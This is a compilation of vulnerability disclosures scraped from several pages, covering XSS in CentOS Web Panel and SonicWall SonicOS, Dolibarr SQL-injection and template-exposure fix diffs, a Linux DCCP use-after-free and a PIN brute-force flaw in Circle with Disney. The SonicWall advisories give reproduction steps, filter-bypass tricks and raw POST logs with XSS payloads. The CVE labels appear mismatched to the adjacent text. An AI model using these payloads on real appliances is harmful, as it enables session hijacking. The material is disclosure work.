index.php in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the id parameter to the phpini_editor module or the email_address parameter to the mail_add-new module.

Reference(s): http://localhost:2030/index.php?module=mail\_add-new Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable \`id\` and \`email address\` parameters of the index.php file POST method request. Disallow usage of special chars and restrict the parameter input to prevent application-side script code injection attacks. Filter in the output error or the item listing the vulnerable location were the code executes. Security Risk: ============== The security risk of the application-side input validation vulnerabilities in the web-application are estimated as medium. (CVSS 4.4) Credits & Authors: ================== Benjamin K.M. \[bkm@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2018-5962

SonicWall SonicOS on Network Security Appliance (NSA) 2017 Q4 devices has XSS via the CFS Custom Category and Cloud AV DB Exclusion Settings screens.

Document Title: =============== SonicWall SonicOS NSA - Bypass & Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1729 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5281 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5280 CVE-ID: ======= CVE-2018-5281 Release Date: ============= 2018-01-04 Vulnerability Laboratory ID (VL-ID): ==================================== 1729 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based malware protection that leverages the power of the cloud. (Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ ) The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features. (Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side vulnerability in the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances. Vulnerability Disclosure Timeline: ================================== 2018-01-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DELL SonicWall Product: Sonicwall SonicOS (all versions) Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A filter bypass issue and an application-side web vulnerability has been discovered in the official SonicWall NSA Web-Firewall Appliance Series with SonicOS. The filter bypass issue allows an attacker to bypass a restricted mechanism or a filter protection to finally evade the controls of the web-application. The \`Security Service\` section with the \`Content Filter\` module allows an attacker to bypass the regular web-filter validation mechanism. Remote attackers with privileged appliance user accounts are able to inject own malicious script codes on the application-side of the affected modules. The filter of the \`CFS Custom Category\` module with the \`Add\` function allows an attacker to bypass the regular web-filter validation of the web-application. As far as an attacker injects in the \`CFS Custom Category\` a payload to the as \`Name\`, he will be forced to use only words without script code by a secure exception-handling. In the Formular of the Edit procedure is also an \`Update\` function available. Remote attackers with local low privileged user accounts are able to bypass the name input validation the following way. First the attacker inserts a regular domain, after that the update function is available. Now the attacker injects his payload to the \` Content\` input field and clicks update to the already temporarily stored entry. Now the illegal payload is inside the listing and can be saved via \`OK\` for further manipulation to compromise the web appliance of sonicwall. The vulnerable files were the injection point is located are \`addTrustedDomainDlg.html\` and \`gavCloudExclusions.html\`. The final script code execution occurs in the \`main.html or index\` file. The same filter bypass issue is located in the \`Cloud AV DB Exclusion Settings\` module with the vulnerable \`Cloud AV Signature ID\` input field context as well. After the context is include an application-side script code execution occurs in the main listing of the \`CFS Custom Category\`. The validation does not encode the input of the Edit formular and sends the context to the item listing in the index of the content filter module. The attack vector of the issue is located on the application-side and the request method to inject is POST. The security risk of the filter bypass and persistent validation vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.5. Exploitation of the persistent input validation web vulnerability requires a low privileged or restricted web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): \[+\] POST Vulnerable Module(s): \[+\] CFS Custom Category \[+\] Cloud AV DB Exclusion Settings Vulnerable File(s): \[+\] addTrustedDomainDlg.html \[+\] gavCloudExclusions.html Vulnerable Inputs(s): \[+\] Name \[+\] Content \[+\] Cloud AV Signature ID Vulnerable Parameter(s): \[+\] cfsRatingObjectName \[+\] selectedItem \[+\] itemList \[+\] cfsRatingDomainList \[+\] gav\_cloud\_exclude\_list \[+\] inputbox \[+\] list Affected Module(s): \[+\] CFS Custom Category - Item Listing (Name & Content) \[+\] Gateway Anti-Virus Signatures - Item Listing (Name & Content) Proof of Concept (PoC): ======================= The filter bypass and application-side input validation vulnerability can be exploited by remote attackers with privileged web-application user account and low or medium user interaction For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the appliance web-application (nsa series) 2. Login to the application 3. Switch to the Security Services 4. Open the Content Filter module 5. Scroll down and click in the \`CFS Custom Category\` the \`Add\` button 6. Now, a new form opens with several inputs Note: To edit existing items the item listing or to add new context to the item listing 7. Include a regular name and a basic content as domain name 8. Save the entry temporarily via \`Add\` to the edit list 9. Choose the same track that you added and include a script code payload after the domainname 10. Now, click on update (Note via Add!) 11. The illegal domain context is now saved Note: We used the update function to bypass the protected Add mechanism 12. Click the Ok button to save the entry to the dbms of the appliance web-application 13. The code executes directly in the item list of the CFS Custom Category module next to the add function 14. Successful reproduce of the filter bypass issue and persistent vulnerability! --- Session Logs (Standard Request) --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/addCfsLocalRating\_-1.html\] Cookie\[curUrl=securityServicesCFView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0\] POST-Daten: csrfToken\[\] cfsRatingObjectName\[test23\] cfsRatingCategory\[2\] selectedItem\[test.com\] itemList\[test.com\] cfsRatingDomainList\[test.com\] refresh\_page\[securityServicesCFView.html\] tableIndex\[-1\] cgiaction\[%5Bobject+Window%5D\] --- PoC Session Logs (POST) \[Inject\] #1 --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/addCfsLocalRating\_-1.html\] Cookie\[curUrl=systemStatusView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0\] POST-Daten: csrfToken\[\] cfsRatingObjectName\[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3EMALIICOUS INJECTED PAYLOAD!\] cfsRatingCategory\[9\] selectedItem\[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E\] itemList\[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E\] cfsRatingDomainList\[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B+++%22%26gt%3B%26lt%3B%22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B\] refresh\_page\[securityServicesCFView.html\] tableIndex\[-1\] cgiaction\[%5Bobject+Window%5D\] --- PoC Session Logs (POST) \[Inject\] #2 --- Status: pending\[\] POST https://utm\_waf.sonicwall.localhost:8351/main.cgi Mime Type\[unknown\] Request Header: Host\[utm\_waf.sonicwall.localhost:8351\] User-Agent\[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Accept-Language\[de,en-US;q=0.7,en;q=0.3\] Accept-Encoding\[gzip, deflate\] Referer\[https://utm\_waf.sonicwall.localhost:8351/gavCloudExclusions.html\] Cookie\[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22 showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22 viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22 connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23FFFFD9%22%5D%2C%22rtDataColors %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%23FFFF33%22%2C %22%23A65628%22%2C%22%23F781BF%22%2C%22%23999999%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D\] POST-Daten: csrfToken\[???\] inputbox\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] list\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] gav\_cloud\_exclude\_list\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] gav\_cloud\_refresh\_exclusions\[\] refresh\_page\[gav\_cloud.html\] isobject\[1\] cgiaction\[%5Bobject+Window%5D\] Reference(s): https://utm\_waf.sonicwall.localhost:8351/main.cgi https://utm\_waf.sonicwall.localhost:8351/gavCloudExclusions.html https://utm\_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html Solution - Fix & Patch: ======================= The vulnerability can be patched by setting up a secure validation for the update inputbox save procedure. Use the same as on the add procedure. Encode the context and disallow usage of special chars in the item list when processing to add. Parse the context and filter the input next to the permanent save that finally displays the context in the main item list to prevent an application-side script code execution. Note: The vulnerabilities has been reported to the dell security team. The issue has been resolved to 2016Q4 - 2017Q4 by the sonicwall developers. Security Risk: ============== The security risk of the application-side input validation web vulnerability and the filter bypass issue are estimated as medium (CVSS 4.5). Credits & Authors: ================== Benjamin K.M. \[bkm@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2018-5281

SonicWall SonicOS on Network Security Appliance (NSA) 2016 Q4 devices has XSS via the Configure SSO screens.

Document Title: =============== SonicWall SonicOS NSA - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1725 Release Date: ============= 2018-01-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1725 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based malware protection that leverages the power of the cloud. (Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ ) The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features. (Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research Team discovered multiple persistent validation vulnerabilities and a filter bypass issue in the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances. Vulnerability Disclosure Timeline: ================================== 2018-01-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DELL Product: SonicWall UTM Firewall (NSA;MX,CLI;TZ) Series 2016 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities and a filter bypass issue has been discovered in the official SonicWall SoniOS NSA UTM Web-Firewall Series. The issue allows remote attackers and privileged user accounts to inject own malicious script codes with persistent attack vector to the affected modules to compromise the web-application or user session data. The peristent exploitable validation vulnerabilities are located in the \`Host Name / IP Address\`, \`Client Name/IP Address\` and \`Proxy Forward To\` input fields of the \`Users - Settings - Configure SSO\` web appliance module. Remote attackers and low privileged application user accounts are able to inject own malicious script codes to the vulnerable input fields to compromise the \`Users - Settings - Configure SSO\` settings module item listing. At the end an attacker is able to save the information as executable content within the backend. After that the malicious context is saved to the SSO configuration module which executes the context. The input fields are not parsed, the context does not encode the input with a secure mechanism. The injection points are the marked input fields with the request method of the vulnerable modules. The execution points are located in the item listing of the separate sections. A filter restriction is implemented and is trying to secure the validation. The filter mechanism parses iframes with src source and other script code tags. In case of a mouseover onload link to a source or an img src onload with cookie alert the tags can bypass the filter validation procedure somehow and an execution of the context occurs. The security risk of the peristent web vulnerabilities and filter bypass issue are estimated as medium with a cvss (common vulnerability scoring system) count of 4.5. Exploitation of the persistent web vulnerabilities and filter bypass issue requires a low privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script codes or persistent web module context manipulation. Affected Request Method(s): \[+\] POST Vulnerable Module(s): \[+\] Users - Settings - Configure SSO - SSO Agents \[+\] Users - Settings - Configure SSO - Terminal Services Agent Settings \[+\] Users - Settings - Configure SSO - RADIUS Accounting Single-Sign-On Vulnerable Input(s): \[+\] Host Name / IP Address \[+\] Client Name/IP Address \[+\] Proxy Forward To Vulnerable Parameter(s): \[+\] ldapServerBindName \[+\] usrTreesSel \[+\] ldapUsrsTree\_1 \[+\] svcObjId Affected Serie(s): \[+\] SonicWALL NSA 6600 \[+\] SonicWALL NSA 5600 \[+\] SonicWALL NSA 4600 \[+\] SonicWALL NSA 3600 \[+\] SonicWALL NSA 2600 \[+\] SonicWALL NSA 250M Affected System(s): \[+\] SonicOS (Standard or Enhanced) Proof of Concept (PoC): ======================= The web vulnerabilities can be exploited by remote attackers with low privileged or restricted appliance application user account with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the appliance web-application firewall of sonicwall and login as restricted user or lower privileged user account 2. Surf to the Users module 3. Click to Settings and open the "SSO Configure" button 4. Open one of the vulnerable modules Note: Users > Settings > Configure SSO > SSO Agents; > Terminal Services Agent Settings or > RADIUS Accounting Single-Sign-On 5. Inject a script code payload to the Host Name/IP Address(es), Client Name/IP Address & Proxy Forward To input fields Note: Regular frames are filtered but img or iframes with alert onload or onmouseover tag do bypass the filter validation 6. Save the entry and the payload directly executes in the utm firewall web user interface 7. Successful reproduce of the application-side input validation vulnerability and filter bypass issue! PoC Payload(s): ">XSS ONMOUSEOVER TEST "> "><"%20%20>"

CVE-2018-5280

SQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.

@@ -33,7 +33,7 @@ $langs\->load("companies");  
// Security check $socid = isset($\_GET\["socid"\])?$\_GET\["socid"\]:''; $socid = GETPOST("socid", 'int'); if ($user\->societe\_id) $socid\=$user\->societe\_id; $result = restrictedArea($user, 'societe',$socid,'');  
@@ -81,7 +81,7 @@ while ($i < $num) { $row = $db\->fetch\_row($resql);  
  
print '<tr class="oddeven">'; print '<td>'.$langs\->trans($commande\->statuts\[$row\[1\]\]).'</td>'; @@ -132,7 +132,7 @@ $var = true; while ($i < $num) {  
$obj = $db\->fetch\_object($resql); print '<tr class="oddeven"><td class="nowrap">'; $commandestatic\->id\=$obj\->rowid; @@ -151,7 +151,7 @@ } if ($total\>0) {  
print '<tr class="liste\_total"><td>'.$langs\->trans("Total").'</td><td colspan="2" align="right">'.price($total)."</td></tr>"; } print "</table>"; @@ -190,7 +190,7 @@ while ($i < $num && $i < 20) { $obj = $db\->fetch\_object($resql);  
print '<tr class="oddeven"><td class="nowrap">'; $facturestatic\->ref\=$obj\->ref; $facturestatic\->id\=$obj\->rowid; @@ -263,7 +263,7 @@  
while ($obj = $db\->fetch\_object($resql) ) {  
  
print '<tr class="oddeven">'; print '<td><a href="card.php?socid='.$obj\->socid.'">'.img\_object($langs\->trans("ShowSupplier"),"company").'</a>'; @@ -300,7 +300,7 @@  
foreach ($companystatic\->SupplierCategories as $rowid => $label) {  
print "<tr ".$bc\[$var\]."\>\\n"; print '<td>'; $categstatic\->id\=$rowid;

CVE-2017-17897: FIX security vulnerability reported by ADLab of Venustech · Dolibarr/dolibarr@4a5988a

Dolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive information.

@@ -26,6 +26,13 @@ \* $elementtype \*/  
// Protection to avoid direct call of template if (empty($conf) || ! is\_object($conf)) { print "Error, template page can't be called as URL"; exit; }  
?>  
 @@ -56,11 +63,11 @@ function init\_typeoffields(type)  
// Case of computed field console.log(type); if (type \== '' || type \== 'varchar' || type \== 'int' || type \== 'double' || type \== 'price') { jQuery("tr.extra\_computed\_value").show(); if (type \== '' || type \== 'varchar' || type \== 'int' || type \== 'double' || type \== 'price') { jQuery("tr.extra\_computed\_value").show(); } else { computed\_value.val(''); jQuery("tr.extra\_computed\_value").hide(); } } if (computed\_value.val()) { console.log("We enter a computed formula"); @@ -75,7 +82,7 @@ function init\_typeoffields(type) jQuery("#default\_value, #unique, #required, #alwayseditable, #ishidden, #list").attr('disabled', false); jQuery("tr.extra\_default\_value, tr.extra\_unique, tr.extra\_required, tr.extra\_alwayseditable, tr.extra\_ishidden, tr.extra\_list").show(); }  
if (type \== 'date') { size.val('').prop('disabled', true); unique.removeAttr('disabled'); jQuery("#value\_choice").hide();jQuery("#helpchkbxlst").hide(); } else if (type \== 'datetime') { size.val('').prop('disabled', true); unique.removeAttr('disabled'); jQuery("#value\_choice").hide(); jQuery("#helpchkbxlst").hide();} else if (type \== 'double') { size.val('24,8').removeAttr('disabled'); unique.removeAttr('disabled'); jQuery("#value\_choice").hide(); jQuery("#helpchkbxlst").hide();} @@ -90,8 +97,8 @@ function init\_typeoffields(type) else if (type \== 'checkbox') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); jQuery("#value\_choice").show();jQuery("#helpselect").show();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").hide();jQuery("#helplink").hide();} else if (type \== 'chkbxlst') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); jQuery("#value\_choice").show();jQuery("#helpselect").hide();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").show();jQuery("#helplink").hide();} else if (type \== 'link') { size.val('').prop('disabled', true); unique.removeAttr('disabled'); jQuery("#value\_choice").show();jQuery("#helpselect").hide();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").hide();jQuery("#helplink").show();} else if (type \== 'separate') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); required.val('').prop('disabled', true); else if (type \== 'separate') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); required.val('').prop('disabled', true); jQuery("#value\_choice").hide();jQuery("#helpselect").hide();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").hide();jQuery("#helplink").hide(); } else { // type = string @@ -102,12 +109,12 @@ function init\_typeoffields(type) if (type \== 'separate') { required.removeAttr('checked').prop('disabled', true); alwayseditable.removeAttr('checked').prop('disabled', true); list.val('').prop('disabled', true); jQuery('#size, #default\_value').val('').prop('disabled', true); jQuery('#size, #default\_value').val('').prop('disabled', true); } else { default\_value.removeAttr('disabled'); required.removeAttr('disabled'); alwayseditable.removeAttr('disabled'); list.val('').removeAttr('disabled'); required.removeAttr('disabled'); alwayseditable.removeAttr('disabled'); list.val('').removeAttr('disabled'); } } init\_typeoffields('<?php echo GETPOST('type'); ?>');

CVE-2017-17898: FIX security vulnerability reported by ADLab of Venustech · Dolibarr/dolibarr@6a62e13

The dccp_disconnect function in net/dccp/proto.c in the Linux kernel through 4.14.3 allows local users to gain privileges or cause a denial of service (use-after-free) via an AF_UNSPEC connect system call during the DCCP_LISTEN state.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2017-8824: security - CVE-2017-8824 linux: use-after-free in DCCP code

An exploitable vulnerability exists in the generation of authentication token functionality of Circle with Disney. Specially crafted network packets can cause a valid authentication token to be returned to the attacker resulting in authentication bypass. An attacker can send a series of packets to trigger this vulnerability.

**Summary**

An exploitable vulnerability exists in the generation of authentication token functionality of Circle with Disney. Specially crafted network packets can cause a valid authentication token to be returned to the attacker resulting in authentication bypass. An attacker can send a series of packets to trigger this vulnerability.

**Tested Versions**

Circle with Disney 2.0.1

**Product URLs**

https://meetcircle.com/

**CVSSv3 Score**

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-307: Improper Restriction of Excessive Authentication Attempts

**Details**

Circle with Disney is a network device used to monitor internet use of children on a given network.

When making any requests to the Circle, an authenticated token must be provided. To request a token, a client specifies an appid, a unique string used to identify the client, as well as a hash, a SHA1 hash to verify the client should have access to the device. One secret piece of information is a 4 digit pin. The hash is calculated by the following:

    hash = SHA1(appid + pin) 
    

The client provides both the appid and hash. Because the key space for the pin is only 10000, an attacker can brute force this pin to retrieve an authentication token. With the authentication token in hand, an attacker can make available API calls.

Circle implements a lockout mechanism that allows to test only 3 pins every 15 minutes. This is implemented by the apid binary, which writes to the file /tmp/failed_token_info the number of authentication attempts and the latest timestamp:

    3 1501762357
    

This resource is saved in /tmp, which is a “tmpfs” directory shared by many components of the system and has a size of 30MB.

